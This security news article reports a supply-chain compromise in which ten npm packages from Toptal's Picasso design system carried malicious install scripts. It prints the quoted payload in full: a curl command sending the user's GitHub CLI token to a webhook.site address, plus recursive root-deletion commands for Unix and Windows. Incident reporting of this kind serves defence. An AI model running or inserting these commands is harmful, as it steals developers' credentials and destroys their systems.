Toptal GitHub Organization Compromised: Malicious npm Packages Steal Tokens & Wipe Systems

Socket’s Threat Research Team has discovered that at least 10 malicious packages were published to npm from within Toptal’s GitHub organization, putting thousands of developers and systems at risk. The affected repositories are part of Toptal’s Picasso design system, a widely used front-end framework for enterprise applications.

The attack weaponized several scoped packages, including:

• @toptal/picasso-tailwind
• @toptal/picasso-charts
• @toptal/picasso-shared
• @toptal/picasso-provider
• @toptal/picasso-select
• @toptal/picasso-quote
• @toptal/picasso-forms
• @xene/core
• @toptal/picasso-utils
• @toptal/picasso-typograph

These packages were downloaded approximately 5,000 times before being detected and removed from npm. The same malicious payload appeared in their package.json files, hidden in lifecycle scripts like preinstall and postinstall.

The attack follows a two-stage strategy designed for maximum impact:

Stage 1: Token Theft

“curl -d \”$(gh auth token)\” https://webhook[.]site/fb5b4647-aff8-418c-99e7-ec830cc2024b”

The preinstall script silently exfiltrates the user’s GitHub token using the GitHub CLI and sends it to a webhook controlled by the attacker. This token could grant unauthorized access to private repositories or be reused in credential stuffing attacks.

Stage 2: System Destruction

“sudo rm -rf –no-preserve-root /”

Immediately after stealing the token, the malware attempts to wipe the victim’s filesystem. The –no-preserve-root flag disables built-in safeguards on Unix systems. For Windows, it uses:

“rm /s /q”

This ensures cross-platform devastation, no matter the environment.

“This dual-platform approach ensures the malicious payload can cause damage regardless of the victim’s operating system,” the report warns.

The exact compromise vector is still under investigation. Socket suggests several possible scenarios:

• Credential Theft – Through phishing, leaks, or credential stuffing
• Insider Threat – A rogue developer with direct GitHub access
• Phishing Variant – Linked to earlier npm phishing attacks targeting projects like prettier
• Separate Vectors – Independent compromises of both GitHub and npm credentials

Toptal acted swiftly upon discovery:

“Toptal responded quickly once the compromise was identified and deprecated the malicious package versions and reverted to their last stable versions, preventing further distribution of the malicious code.”

Their prompt mitigation likely prevented wider impact across the JavaScript ecosystem.

Update on August 6th,

Toptal has released an official statement for this security incident, you can read the details here.

Related Posts:

• Malicious npm Packages Exploiting Typosquatting to Inject SSH Backdoors
• Malicious npm Packages Backdoor Telegram Bot Developers
• Malicious npm Packages Threaten Crypto Developers: Keylogging and Wallet Theft Revealed
• SentinelOne Unveils: The Hidden Dangers of npm in Business Security
• North Korean Cyberattacks Persist: Developers Targeted via npm